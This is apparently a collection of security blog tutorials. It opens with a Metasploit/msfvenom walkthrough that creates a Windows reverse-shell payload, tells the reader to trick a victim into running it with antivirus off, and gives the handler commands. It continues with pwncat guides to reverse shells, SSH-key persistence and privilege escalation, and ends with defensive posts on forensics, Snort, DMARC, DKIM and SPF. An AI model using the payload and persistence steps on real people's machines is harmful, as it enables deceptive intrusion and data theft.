Windows Exploit via Metasploit or MSFVENOM

Basic Idea

  • Creating Malicious Payload.
  • Trick Victim to execute it.
  • Perform Exploit.
Let's dig deeper (Only for Educational Purposes)

Metasploit

Hacking, exploits, vulnerabilities – these are the keywords for Metasploit. Metasploit is a massive database/framework which is used by hackers and security professionals to attack or audit environments.

Metasploit holds thousands of exploits, payloads, and scanners which can be used to hack computers, web servers, and other digital environments. Metasploit contains various backdoors which can be inserted at targeted environments. These backdoors will grant the security professional or hacker access to the infected device.

  • Step 1: Use ifconfig to find your IP address. 
Getting your IP
  • Step 2: Now create a malicious payload using msfvenom. Use the command: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=4444 -f exe -o payload.exe
Creating Backdoor/Malware
  • Step 3: After executing the command, you will see a payload created in the current working directory.
  • Step 4: Deliver this payload to the victim and trick the victim into executing the payload. 
This will only work if the victim's virus protection is off. 
Turning off virus protection
  • Step 5: Once the victim runs the payload, we can gain access to the victim's machine.
Meanwhile, we have to start a listener on our machine to receive a connection for the victim.
  • Step 6: Set up your Metasploit listener. Command: msfconsole. In Metasploit, type:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.29.146
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
Here LHOST will be your IP address.
  • Step 7: Check for active sessions using command sessions. In our case session id is 1.
  • Step 8: Now to execute that particular session, use command sessions -i <session_id>.
  • Step 9: Do reconnaissance on the system configuration using the command sysinfo (provides information about the target).
  • You can also take a screenshot of the victim's screen by using the command screenshot.

We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.


Dive Deep into pwncat - Download or Upload Files

pwncat is a command and control framework that turns a basic reverse or bind shell into a fully-featured exploitation platform.

Uploading Files

Usually, transferring a file from our host machine to the victim machine is tedious. It involves hosting a Python HTTP server and then using a tool like wget on Linux to download the file.

But pwncat does all of this with ease. It does not require you to host an HTTP server with Python or to have wget available to fetch the file. You can simply upload the file with the command upload filename.

In CTF competitions, we often need to upload winPEAS or linPEAS for privilege escalation, so pwncat saves a lot of time transferring files.

Uploading File Example
In the picture attached the /etc/hosts file is uploaded to /tmp/hosts of the victim machine from the host machine.

Downloading Files

Downloading files is also easy in pwncat. You can easily download a file from the victim machine to the host machine. This is usually useful when you want to edit a file in your host machine. 

To edit such a file for privilege escalation, download it, edit it, and upload it back. For example, suppose you find a cron job that runs every minute and whose script is owned by root but writable by your current user; with pwncat you can download that file to your machine and edit it with ease.

Usually, editing on a remote machine is tough. Here pwncat helps you download the file, after which you can re-upload the edited file and set up a listener so that we get a reverse shell when the cron job runs again.

Downloading File Example
pwncat is a good tool in CTF-like environments, but make sure you do not use it in exams like the OSCP, because automation capabilities such as escalating privileges to other users with a single command and automatic enumeration are marked as not allowed by Offensive Security. In CTFs, pwncat is a much better tool than netcat.

    Dive Deep into pwncat - Privilege Escalation & Persistence

    pwncat is a command and control framework that turns a basic reverse or bind shell into a fully-featured exploitation platform.

    Persistence

    Persistence Example
    pwncat can maintain persistence on the target machine. If the connection is lost and we need to regain the shell, it is a burden to re-enter the SSH password, and in situations like a CTF that is a huge time loss.

    What we can do is upload our public key to the server's authorized_keys so that we can access it without typing the account password every time. pwncat automates this with the persist module, which adds our public key to the authorized_keys of the victim machine so that we need not use a password to log in again.

    You can also see the status of your persistence method with the persist --status command. After our operation or getting the flag, if we need to remove the traces of our actions we can easily do that with persist --clean, which removes our authorized key from the victim machine.

    If you want to track all the operations performed on the remote machine, the tamper command in pwncat helps you track your activity.
    Tamper Example
    Also, if you want to revert all the changes you made on the remote target you can do it with a single command tamper --revert --all
    Revert all changes

    Privilege Escalation

    Privilege Escalation Methods
    pwncat can list available privilege escalation methods. In the figure, we can see that pwncat escalates privileges to the developer user without a password with the help of vim. pwncat can attempt automated privilege escalation; a number of methods are implemented by default, such as:
    • Set UID Binaries
    • Sudo (with and without password)
    • Screen (CVE-2017-5618)
    • DirtyCOW
    Escalating user to sysadmin
    Pwncat can also automatically detect and fix mismatched EUID and UID after an attempted privilege escalation. In the attached picture we can see that we need to escalate the user to sysadmin. 

    The -u flag stands for the user and the -e flag stands for escalate. Here we escalate our privileges to those of sysadmin with just one command. We can see that we elevated our normal user to developer with the help of a vim misconfiguration and then to the sysadmin user with the help of a setuid mismatch.

    JSON File of GTFOBins
    pwncat does this the same way a user would use GTFOBins to find privesc methods. The pwncat developers maintain a JSON file with a lot of information about different privesc methods.

      Dive Deep into pwncat - Enumeration & Busy Box

      pwncat is a command and control framework that turns a basic reverse or bind shell into a fully-featured exploitation platform.

      Utilize your connection for enumeration of the target machine

      The first thing we do after receiving a connection is enumerate the users, groups, and other information about the target. The goal is to find a way to elevate to higher privileged users, which is usually hectic by hand. pwncat can do this in an automated manner.

      The enumeration in pwncat is achieved through the enumerate.* modules. Enumeration can be run individually or you can use one of the automated enumeration groups. By default, enumeration modules run only once and their results are cached in the database. The enumerate.gather module is used to gather enumeration facts from all other enumeration modules. 

      # Enumerate only SUID and File Capability enumeration types
      (local) pwncat$ run enumerate.gather types=file.suid,file.caps

      # Enumerate facts from all available modules
      (local) pwncat$ run enumerate.gather

      The enumerate.quick module enumerates some useful types of enumeration data but is intended not to take much time. Both enumerate.gather and enumerate.quick implement the output parameter, which allows you to write the enumeration results to a markdown file instead of standard output.

      # Output a markdown formatted report to results.md
      (local) pwncat$ run enumerate.auto output=results.md

      Example for SUDO
      The image above shows how pwncat gathered facts about sudo and was able to elevate privileges to the sudo or root user with the help of vim, since the rule showed NOPASSWD.

      Busy Box

      Install BusyBox
      BusyBox combines tiny versions of many common UNIX utilities into a single small executable. This helps you get all the essential utilities onto the target machine if they are not available there.

      BusyBox provides a fairly complete environment for any small or embedded system. It has been written with size optimization and limited resources in mind. In a file of a few hundred KB, one gets a huge list of functionality on the system.

        pwncat Basics

        pwncat is a command and control framework that turns a basic reverse or bind shell into a fully-featured exploitation platform.


        The basic mode of pwncat

        • In Terminal Mode: It acts as a normal terminal that we obtain by a reverse shell.
        • In pwncat CLI (command-line interface) Mode: Here, we will get all other special features that pwncat has to offer. 
        Ctrl + D switches between the two modes.

        Establishing a bind shell

        A bind shell is a type of shell in which the target machine opens a connection port or listener and waits for an incoming connection. As soon as a connection is established, it executes /bin/bash, which gives the attacker access to the victim machine.

        Bind Shell Comparison

        Establishing a reverse shell

        A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the localhost. Here we can see that just like netcat we can receive connections by using -lp which means listen on a port. But the shell that we obtain has much more features than an ordinary shell that we get with the help of netcat.
        Reverse Shell Comparison

        All kinds of connections are possible via pwncat

        Connection Example

          Introduction to pwncat

          pwncat is a command and control framework that turns a basic reverse or bind shell into a fully-featured exploitation platform. This is somewhat similar to netcat. We can use this tool to get the reverse shell from the victim's machine.

          A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the localhost. 


          A bind shell is a type of shell in which the target machine opens up a communication port or a listener on the victim machine and waits for an incoming connection.


          Netcat is a very good tool to receive connections and enumerate further, but it has some drawbacks. Binding and stabilizing the shell in netcat works well, but the added steps to get a usable reverse shell become repetitive after a while. There is also a high risk of losing your remote shell by accidentally pressing Ctrl-C before gaining raw access.


          pwncat solves this by running a script on the target machine, containing all those commands, as soon as the connection is established. This gives a terminal that has more features and is not easily broken. Beyond simply running a script on the target to get an unbreakable, fully functional shell, it offers a huge number of additional features.


          Some of the important features of pwncat:

          • Utilize your connection for enumeration of the target machine.
          • File upload/download.
          • Automatic persistence installation.
          • Automated privilege escalation.

          Installation

          pwncat requires Python and pip.
          cd pwncat
          • It is recommended to use a virtual environment. This can be done easily with the Python 3 venv module:
          python -m venv env
          source env/bin/activate
          python setup.py install
          • If pip is not installed, you can install pwncat with the provided setup script:
          python setup.py install --user
          • To verify the installation, run pwncat --help.
          pwncat is successfully installed

          First Responder in Cyber Incident, Explained!


          Roles of First Responder

          1. Identifying the crime scene
          2. Protecting the crime scene
          3. Preserving temporary and fragile evidence
          4. Collecting the complete information about the incident
          5. Documenting all the findings
          6. Packaging and transporting the electronic evidence.

          Toolkit

          1. A first responder toolkit is a set of tools that helps first responders collect genuine and presentable evidence. 
          2. It helps first responders to understand the limitations and capabilities of electronic evidence at the time of collection.
          3. First responders have to select trusted computer forensics tools that produce specific output information.

          Creating Toolkit

          1. Create a trusted forensic computer or testbed
          • Choose the related operating system.
          • Completely sanitize the forensics computer
          • Install the operating system and required software
          • Update and patch the forensics computer
          • Install a file integrity monitor to test the integrity of the file system

          2. Document the details of the forensics computer
          • Version name and type of the operating system
          • Name and types of different software
          • Name and types of the installed hardware

          3. Document the summary of the collected tools
          • It helps the first responder to understand how a tool works
          • The summary comprises:
            • Acquisition of the tool
            • Detailed description of the tool
            • Working of the tool
            • Tool dependencies and the system effects

          4. Test the tools
          • Test the collected tools on the forensics computer and examine the performance and output
          • Examine the effects of the tool on the forensics computer

          Tools

          • Notebook Computers - Licensed Software, Bootable CD, External hard drives and Network cables.
          • Software tools - Encase Forensics, Forensic Tool Kit (FTK), ProDiscover, Hex Workshop, X-Ways Forensics.
          • Hardware Tools - Paraben forensics hardware, Digital Intelligence forensic hardware, Tableau Hardware accelerator, Wiebetech forensics hardware tools, Logicube forensics hardware tools.


          SNORT - Intrusion Detection/Prevention Systems

          IDS stands for Intrusion Detection System and IPS stands for Intrusion Prevention System. IDS and IPS work on the same principle: they analyze packets coming from the outside network against a set of rules derived from a database of known cyberattacks. Both match the signatures of packets against that known-attack database.

          The difference between IDS/IPS is that IDS only detects the incoming attack and alerts the administrator to take action against the attack while the IPS not only detects but also stops the packet from being delivered based on sets of rules. 


          Both IDS and IPS work somewhat like an antivirus, which compares the signature of an application against the list of malicious signatures it stores. Most often an IDS is deployed behind the firewall at the edge of the network, whereas an IPS is generally placed at the edge of the network such that traffic passes through it, for example immediately inside an Internet firewall. An IPS requires more computational power, since it performs both prevention and detection.


          One of the most widely used IDS/IPS is Snort. Snort is an open-source network intrusion detection system and intrusion prevention system.


          Installation

          First, make sure the OpenSSH server is installed on Ubuntu. It is installed by default, but if it is not, you can install it with the command apt-get install openssh-server.
          • Snort is available in the ubuntu package. To install, use the command, apt-get install snort*.
          SNORT installation command
          • Meanwhile, you will get a prompt asking on which interface you want to configure Snort. This will also set up the home network with its CIDR range.
          Set up Interface
          Your interface name will be different. Run ifconfig or ip a to check the name of the interface.
          With these two simple steps, Snort is installed. Several files are created in /etc/snort/, which are used to set up Snort as an IDS.

          SNORT files location

          Configuring SNORT as IDS:

          • Open the configuration file which is located at /etc/snort/snort.conf as a super user. You can use any text editor to open the file. 
          • Set the HOME_NET variable which is nothing but your network's IP. 
          Change the HOME_NET value
          • After setting the HOME_NET variable, there are some sets of rules that are predefined for different services like SSH, FTP, Nmap, etc. 
          • A glimpse of the rules, located in /etc/snort/rules/, is shown below. The first rule says to alert the user if any packet arrives at the HOME_NET network on port 21.
          FTP rules set
          • Now, to check that the configuration and this rule load correctly, run Snort in test mode with the command sudo snort -T -c /etc/snort/snort.conf -i ens33 (replace ens33 with your interface).
          Command to activate
          • To start the SNORT application, we need to run the following command sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i ens33.
          Command to initiate
          • After this, whenever a request arrives that the rules classify as a possible attack, Snort displays an alert on the terminal.


          DMARC Record - Explained

          SPF, DMARC, and DKIM are the email security protocols used by companies or businesses to prevent various phishing attacks. Phishing and email spam are the biggest opportunities for hackers to enter the network. If a user clicks on a malicious email attachment, it can compromise an entire enterprise with ransomware, crypto-jacking scripts, data leakages, or privilege escalation exploits.

          Source - From the Internet

          DMARC is an acronym for “Domain-based Message Authentication, Reporting, and Conformance”. It’s an email authentication, policy, and reporting protocol that’s actually built around both SPF and DKIM. It has three basic purposes:

          • Verifies that a sender’s email messages are protected by both SPF and DKIM,
          • Tells the receiving mail server what to do if neither of those authentication methods pass, and
          • Provides a way for the receiving server to report back to the sender about messages that pass and/or fail the DMARC evaluation (it is kinda a big fellow in the ground).

          Since DMARC uses both SPF and DKIM, you may wonder why it’s even necessary. Well, it’s simple: DMARC basically builds on SPF and DKIM to ensure that, when an email is received, the information contained in both records matches the “friendly from” domain (e.g., me@my-domain.com) that the user actually sees and the "from address" that is in the message’s header. This is what the folks at Dmarcian, a company founded by one of the primary authors of the DMARC specification, call “Identifier Alignment.”

          CHECKING FOR DMARC RECORDS

          DMARC Check Tool by MX Toolbox
          • Enter your domain name for which you want to check DMARC record. For example, GitHub.com
          • If you get results like the following, congrats: your domain already has DMARC configured and its mail is protected from phishing.
          DMARC Record Example
          If the website does not have the Records, check the below section.

          CREATE DMARC RECORDS

          Once you have both SPF and DKIM in place, then it’s time to create your DMARC record. The easiest way to do this is to use a DMARC wizard. There are many sites that offer such a tool: MXToolbox, DMARC Analyzer (requires to sign up), Dmarcian, and more. The Dmarc.org site also provides a list of utilities for generating DMARC records, DMARC lookup and parsing, message validation, and more. Most of these sites also have tools to validate your DMARC record once DNS propagation has taken place.

          Regardless of the tool you use, a DMARC record utilizes a number of “tags”. There are really only 2 tags that are actually required: “v” and “p”. Other tags are purely optional, and DMARC experts kind of disagree on which optional tags are recommended and which are not. Let’s look at the required tags first:

          • v - This is the version tag, just like with SPF. It MUST be “DMARC1” and be the first tag listed in the DMARC record.
          • p - This is the policy tag. It tells the receiving server which policy to apply to a message that fails DMARC: “none” or do nothing to a message, “quarantine” a message, or “reject” the message.
          Optional tags include the following:
          • pct - This is the percent of suspicious messages that the DMARC policy applies to. Of course, the default is 100, but it can be set to whatever you want it to be.
          • rua=mailto:address@company.com - This tag tells receiving servers where to send aggregate reports. These reports provide visibility into the health of the sending server by helping to identify potential authentication issues or malicious activity. These reports are sent daily, so, ideally, if you want reports sent, they’re sent to a mail address set up specifically FOR these reports and not a domain admin account.
          • fo - This tag lets receiving servers know that samples of messages that fail either SPF and/or DKIM should be returned to the sender. There are four value options for this tag:
            • 0: Generate a DMARC failure report if both SPF and DKIM fail to produce a “Pass” result. This is the default option.
            • 1: Generate a DMARC failure report if both SPF and DKIM produce something other than a “Pass” result. This is the recommended option.
            • d: Generate a DKIM failure report if the message had a DKIM signature that failed the evaluation, regardless of why.
            • s: Generate an SPF failure report if the message failed SPF evaluation, regardless of why.

          So what does a DMARC record look like? Let's look at the record for SmarterTools:


          v=DMARC1; p=none; rua=mailto:fbl@smartertools.com; fo=1


          As you can see, both required tags, v and p, are set, along with a few optional tags. The policy tag (p) is set to “none”. So we are basically collecting feedback on messages, but we are not “interrupting the flow of messages”, even if they fail SPF and/or DKIM. From a DMARC rollout perspective, this is a prudent course of action. That is because, while DMARC is a serious way to catch potential phishing emails, it is not yet a widely adopted policy, and many domains don’t have SPF or DKIM set up, let alone both. So for the time being, simply watching messages and observing their disposition, without quarantining or outright rejecting them, is the best way to go for DMARC implementation.
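The record above and the “Identifier Alignment” idea, worked as an added example (not code from the original post): a parser for the DMARC tags described here and a disposition check that applies the p= policy only when neither SPF nor DKIM passed for a domain aligned with the visible From: domain. The suffix-based relaxed alignment and the sample domains are assumptions for illustration; real DMARC compares organizational domains.

```python
"""Parse a DMARC TXT record and evaluate a message against it.

Added example, not code from the original post. It implements the tags the
post describes (v, p, pct, rua, fo) and the 'Identifier Alignment' idea: a
message passes DMARC only if SPF or DKIM passed for a domain aligned with the
visible From: domain. Alignment here is a simplified relaxed mode (suffix
match), an assumption made for illustration; real DMARC compares
organizational domains."""
from typing import Dict, List, Optional, Union

REQUIRED_TAGS = ("v", "p")
POLICIES = ("none", "quarantine", "reject")
FO_OPTIONS = ("0", "1", "d", "s")


def parse_dmarc(record: str) -> Dict[str, Union[str, int, List[str]]]:
    """Split 'tag=value; tag=value' and validate required and optional tags."""
    tags: Dict[str, str] = {}
    order: List[str] = []
    for part in record.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" not in part:
            raise ValueError(f"malformed tag: {part!r}")
        key, value = part.split("=", 1)
        key = key.strip().lower()
        tags[key] = value.strip()
        order.append(key)

    for tag in REQUIRED_TAGS:
        if tag not in tags:
            raise ValueError(f"missing required tag {tag}=")
    # v MUST be DMARC1 and MUST be the first tag in the record.
    if order[0] != "v" or tags["v"] != "DMARC1":
        raise ValueError("v=DMARC1 must be the first tag")
    if tags["p"] not in POLICIES:
        raise ValueError(f"unknown policy {tags['p']!r}")

    pct = int(tags.get("pct", "100"))          # default: apply to 100%
    if not 0 <= pct <= 100:
        raise ValueError("pct must be 0..100")
    rua = [u.strip() for u in tags.get("rua", "").split(",") if u.strip()]
    for uri in rua:
        if not uri.lower().startswith("mailto:"):
            raise ValueError(f"rua must be a mailto: URI, got {uri!r}")
    fo = [opt for opt in tags.get("fo", "0").split(":") if opt]
    for opt in fo:
        if opt not in FO_OPTIONS:
            raise ValueError(f"unknown fo option {opt!r}")
    return {"v": tags["v"], "p": tags["p"], "pct": pct, "rua": rua, "fo": fo}


def is_valid_dmarc(record: str) -> bool:
    """Convenience wrapper: True if the record parses cleanly."""
    try:
        parse_dmarc(record)
        return True
    except ValueError:
        return False


def aligned(auth_domain: Optional[str], from_domain: str) -> bool:
    """Relaxed alignment: the domain SPF/DKIM authenticated must equal the
    From: domain or share it as a parent (suffix test; see module docstring)."""
    if not auth_domain:
        return False
    a = auth_domain.lower().rstrip(".")
    f = from_domain.lower().rstrip(".")
    return a == f or a.endswith("." + f) or f.endswith("." + a)


def dmarc_disposition(record: str, from_domain: str,
                      spf_pass_domain: Optional[str],
                      dkim_pass_domain: Optional[str]) -> str:
    """Return 'pass' if SPF or DKIM passed for an aligned domain; otherwise
    the action the record requests: 'none', 'quarantine' or 'reject'."""
    policy = parse_dmarc(record)
    if aligned(spf_pass_domain, from_domain) or aligned(dkim_pass_domain, from_domain):
        return "pass"
    return str(policy["p"])


if __name__ == "__main__":
    # The SmarterTools record quoted above: p=none, so a failing message is
    # only reported (disposition 'none'), not quarantined or rejected.
    # 'bulk-sender.example' is a constructed, unaligned SPF domain.
    record = "v=DMARC1; p=none; rua=mailto:fbl@smartertools.com; fo=1"
    print(parse_dmarc(record))
    print(dmarc_disposition(record, "smartertools.com", "bulk-sender.example", None))
```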



          Are SPF, DKIM, and DMARC records Necessary

          SPF, DMARC, and DKIM are the email security protocols used by companies or businesses to prevent various phishing attacks. Phishing and email spam are the biggest opportunities for hackers to enter the network. If a user clicks on a malicious email attachment, it can compromise an entire enterprise with ransomware, crypto-jacking scripts, data leakages, or privilege escalation exploits.


          Having those three records in place is considered the best practice. As the saying goes, “An ounce of prevention is worth a pound of cure.” For email, this has never been more true. Having all three records in place shows that your email domains are truly who they say they are. It also shows that you as an administrator, and your domain administrators as well, are all serious about ensuring you’re following best practices and doing your part to prevent spam, phishing, and other email security issues.


          DKIM Record - Explained


          SPF, DMARC, and DKIM are the email security protocols used by companies or businesses to prevent various phishing attacks. Phishing and email spam are the biggest opportunities for hackers to enter the network. If a user clicks on a malicious email attachment, it can compromise an entire enterprise with ransomware, crypto-jacking scripts, data leakages, or privilege escalation exploits.


          DKIM is an acronym for DomainKeys Identified Mail. When sending an email from a server that has DKIM configured, the server hashes the body and the header of the email separately. It then creates a signature with a private key, which is sent along with the email.


          When the receiver gets the email, it makes a DNS request to the domain the email claims to be from. In doing so, the receiver obtains the public key, which is the DKIM record. With that key it can verify whether the signature is correct, and by doing so it confirms that the sender is genuine and the mail has not been manipulated on its way there.

          CHECKING FOR DKIM RECORDS

          DKIM Records Lookup by MX Toolbox
          • Enter the domain name and selector (A DKIM selector is text, that is added with the domain to create a unique DNS record used during DKIM. This allows multiple keys to exist under one domain which allows for different signatures to be created by different systems, date ranges, or third-party services). For example, GitHub.com.
          • If you get results like the following, the domain has a DKIM record and it's safe.

          If the website does not have the Records, check the below section.

          Create DKIM Records

          Ideally, your mail server will provide a tool that allows you to create the information right on the server. (For SmarterMail users, information on “Setting Up Email Signing” is available in the Help documentation). Regardless of how you create your record, the following information is part of it:
          • s - This is the selector and it indicates the record “name” used with the domain to locate the public key in DNS. The sender creates this (again, ideally automatically).
          • d - This indicates the domain, used by the sender. Used with the selector record and helps locate the public key.
          • p - This is the actual public key that gets published to DNS as part of the record. Therefore, it will look like a random set of upper and lower case letters, numbers, and some punctuation marks.

          Selector, domain and public key are the three parts every DKIM deployment needs. Other tags exist (v=, k=, t=, h=, n=), but these three carry the essentials, so a typical published record looks like this (public key abbreviated):

          2B8U4DAB93D58YR._domainkey.yourdomain.com.  IN  TXT  "v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC1TaNgLlSyQMNWVLNLvyY/neDgaL2oqQE8T5illKqCgDtFHc8eHVAU+nlcaGmrKmDMw9dbgiGk1ocgZ56NR4ycfUHwQhvQPMUZw0cveel/8EAGoi/UyPmqfcPibytH81NFtTMAxUeM4Op8A6iHkvAMj5qLf4YRNsTkKAV"

          In the above, you’ll find the following:

          • Selector (s): 2B8U4DAB93D58YR
          • Domain (d): yourdomain.com
          • Public Key (p): MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC1TaNgLlSyQMNWVLNLvyY/neDgaL2oqQE8T5illKqCgDtFHc8eHVAU+nlcaGmrKmDMw9dbgiGk1ocgZ56NR4ycfUHwQhvQPMUZw0cveel/8EAGoi/UyPmqfcPibytH81NFtTMAxUeM4Op8A6iHkvAMj5qLf4YRNsTkKAV
          The rest of the record is the same however it is created: the fixed _domainkey label in the name, and the standard v=DKIM1 and k=rsa tags in the value. Two things to check when publishing by hand: the label is _domainkey (DNS names are case-insensitive, so _domainKey resolves too, but the specification spells it in lower case), and a DNS TXT record is made of strings of at most 255 characters, so a 2048-bit key, whose p= value alone is 392 characters, has to be entered as two or more quoted strings that resolvers join back together.
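To make the structure above concrete, here is an added example (editor's code, not from the original post or any mail server product) that builds a selector._domainkey.domain TXT record from RSA key parameters, splits it into 255-character DNS strings, and parses a published record back into its tags and its (n, e) values. It assumes standard-library Python only; PLACEHOLDER_N is a constructed number that stands in for a real modulus, so the resulting record is for illustration and must never be published.

```python
"""DKIM public-key record: build selector._domainkey.domain TXT "v=DKIM1; k=rsa; p=..." and parse it back.

Added example. PLACEHOLDER_N is a constructed stand-in for an RSA modulus, not a real key;
generate real keys with proper RSA key generation (e.g. openssl genrsa) before publishing.
"""
from __future__ import annotations

import base64

RSA_OID_DER = bytes.fromhex("06092a864886f70d010101")  # OID 1.2.840.113549.1.1.1 (rsaEncryption)
PLACEHOLDER_N = (1 << 1023) | 0x10001                    # 1024-bit stand-in modulus (constructed)
PLACEHOLDER_E = 65537


def der_len(n: int) -> bytes:
    """DER definite-form length encoding."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def der_int(v: int) -> bytes:
    """DER INTEGER; a leading 0x00 keeps values whose top bit is set positive."""
    body = v.to_bytes(max(1, (v.bit_length() + 7) // 8), "big")
    if body[0] & 0x80:
        body = b"\x00" + body
    return b"\x02" + der_len(len(body)) + body


def der_seq(*parts: bytes) -> bytes:
    body = b"".join(parts)
    return b"\x30" + der_len(len(body)) + body


def rsa_spki_der(n: int, e: int) -> bytes:
    """SubjectPublicKeyInfo (RFC 5280) for an RSA key: exactly what the p= tag carries, base64-encoded."""
    rsa_public_key = der_seq(der_int(n), der_int(e))
    bit_string = b"\x03" + der_len(len(rsa_public_key) + 1) + b"\x00" + rsa_public_key
    return der_seq(der_seq(RSA_OID_DER, b"\x05\x00"), bit_string)


def build_dkim_record(selector: str, domain: str, n: int, e: int) -> tuple[str, str]:
    """Return (owner name, TXT value) to publish in DNS."""
    p = base64.b64encode(rsa_spki_der(n, e)).decode()
    return f"{selector}._domainkey.{domain}.", f"v=DKIM1; k=rsa; p={p}"


def txt_strings(value: str, limit: int = 255) -> list[str]:
    """Split a TXT value into <=255-character strings; a 2048-bit key always needs more than one."""
    return [value[i:i + limit] for i in range(0, len(value), limit)]


def parse_dkim_record(txt: str) -> dict[str, str]:
    """Parse the tag=value list (RFC 6376 section 3.2); whitespace inside values is dropped."""
    tags: dict[str, str] = {}
    for item in txt.split(";"):
        if "=" in item:
            key, value = item.split("=", 1)
            tags[key.strip()] = "".join(value.split())
    return tags


def _tlv(buf: bytes, pos: int) -> tuple[int, bytes, int]:
    """Read one DER tag/length/value starting at pos; return (tag, value, position after it)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length


def rsa_key_from_record(tags: dict[str, str]) -> tuple[int, int]:
    """Decode p= back to (n, e); raise ValueError for anything that is not an RSA DKIM1 key."""
    if tags.get("v", "DKIM1") != "DKIM1" or tags.get("k", "rsa") != "rsa":
        raise ValueError("not an RSA DKIM1 record")
    if tags.get("p", "") == "":
        raise ValueError("empty p= means the key has been revoked")
    spki = base64.b64decode(tags["p"], validate=True)
    tag, spki_body, _ = _tlv(spki, 0)
    if tag != 0x30:
        raise ValueError("p= is not a DER SEQUENCE")
    tag, alg_id, pos = _tlv(spki_body, 0)
    if tag != 0x30 or not alg_id.startswith(RSA_OID_DER):
        raise ValueError("algorithm is not rsaEncryption")
    tag, bits, _ = _tlv(spki_body, pos)
    if tag != 0x03 or bits[:1] != b"\x00":
        raise ValueError("malformed BIT STRING")
    _, rsa_public_key, _ = _tlv(bits, 1)
    _, n_bytes, pos = _tlv(rsa_public_key, 0)
    _, e_bytes, _ = _tlv(rsa_public_key, pos)
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")


if __name__ == "__main__":
    name, txt = build_dkim_record("2B8U4DAB93D58YR", "yourdomain.com", PLACEHOLDER_N, PLACEHOLDER_E)
    print(name, "IN TXT", " ".join(f'"{s}"' for s in txt_strings(txt)))
    print(rsa_key_from_record(parse_dkim_record(txt)) == (PLACEHOLDER_N, PLACEHOLDER_E))
```

Running it prints a record whose p= starts with MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ, the same prefix as the 1024-bit key shown above, because that prefix is the DER header every 1024-bit RSA SubjectPublicKeyInfo shares. The parser also treats an empty p= as a revoked key, which is what RFC 6376 specifies and what a checker should report rather than "no record".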

          We hope this helps. If you have any suggestions or doubts, add a comment and we will reply as soon as possible.


          SPF Record - Explained


          SPF, DKIM and DMARC are the email authentication protocols that companies use to make their domains harder to spoof in phishing attacks. Phishing and spam email are among the most common ways attackers gain a foothold in a network: one user opening a malicious attachment can lead to ransomware, crypto-mining scripts, data leakage, or privilege-escalation exploits across the enterprise.


          SPF stands for "Sender Policy Framework". Like the other two checks, it is published as a DNS TXT record; it lists the IP addresses and servers that are allowed to send email for that domain. A receiving server compares the IP address of the connection that delivered the message with that list. The comparison is made against the domain of the envelope sender (the SMTP MAIL FROM address, or the HELO name when MAIL FROM is empty), not against the From: header the user sees. That is why SPF on its own does not stop a spoofed display From: address, and why DMARC adds an alignment check between the two.

          SPF does not harden your DNS servers; it uses DNS to publish a policy that restricts which hosts may send email for your domain, so receivers can reject envelope-sender spoofing. SPF has three parts: the policy record itself, the check a receiving server performs when a message arrives, and the Received-SPF (or Authentication-Results) header it adds to the delivered message to record the outcome. SPF was first published as the experimental RFC 4408 in 2006 and was replaced by the current specification, RFC 7208, in 2014.


          CHECKING FOR SPF RECORDS

          SPF Checker website by MX Toolbox
          • Enter the domain name and search for the records. For example, GitHub.com.
          • If the lookup returns a record in the following form, the domain publishes an SPF policy. The existence of a record is not by itself proof that the domain is "safe": what matters is its content, in particular whether it ends in -all or ~all rather than +all, and whether it stays within the limit of 10 DNS lookups described below.
          SPF Records of GitHub
          If the website does not have the Records, check the below section.

          Create SPF Records

          An SPF record is a simple string that a domain administrator adds to DNS as a TXT entry at the domain's apex. It is built from a few parts:
          • The SPF version being used.
          • The IPs that are authorized to send email for the domain.
          • Any third-party domains whose SPF records are authorized to send email on the domain's behalf.
          • A closing "all" term, whose qualifier tells a receiving server what to do with mail from a source that matched nothing earlier in the record.

          v=spf1 ip4:22.23.24.25 include:another-domain-that-can-send-email-for-us.com -all

          • v=spf1 - States that version 1 of SPF is being used. There is no other version at this point, so this should always be "v=spf1" until another version is released. (Sender ID, a separate Microsoft proposal that used spf2.0 records, has been abandoned.)
          • ip4:22.23.24.25 - An IPv4 address (or, with a prefix length, a range) that is authorized to send email. Several can be listed, so if your mail provider sends from more than one address, list each one (ip4:22.23.24.25 ip4:12.13.14.15) or a CIDR block (ip4:22.23.24.0/24). Write CIDR blocks on a network boundary: 22.23.24.0/20 has host bits set, so evaluators mask it to 22.23.16.0/20 and you end up authorizing a different range than you intended. IPv6 senders are listed with the ip6: mechanism (for example ip6:2001:db8::/32); every address family your servers send from must be covered.
          • include:another-domain-that-can-send-email-for-us.com - Authorizes any host that passes that domain's own SPF record, which is how third-party mailers are delegated. List each such domain as its own include. Every include, and every a, mx, ptr, exists and redirect= term as well, costs a DNS lookup, and RFC 7208 caps the total at 10 per check, counting the lookups inside included records too. Going over produces a permerror, which DMARC treats as a non-pass, so a long chain of includes can break mail that is otherwise correctly configured.
          • all - Matches every IP. Placed last, its qualifier decides what the receiving server should do with mail from a source that matched none of the earlier terms. The qualifier is the character in front of "all":
            • -all (dash all) - Hard fail. Hosts not listed in the record are not authorized to send email for the domain, and the receiving server should reject the message.
            • ~all (tilde all) - Soft fail. The host is not listed, but the receiving server should accept the message and mark it, typically as suspicious or possible spam.
            • ?all (question-mark all) - Neutral. The domain makes no statement about the host, which receivers treat much like having no record at all.
            • +all (plus all) - THIS IS NOT RECOMMENDED. Every source passes, so the record authorizes the whole Internet to send email as your domain and provides no protection at all.
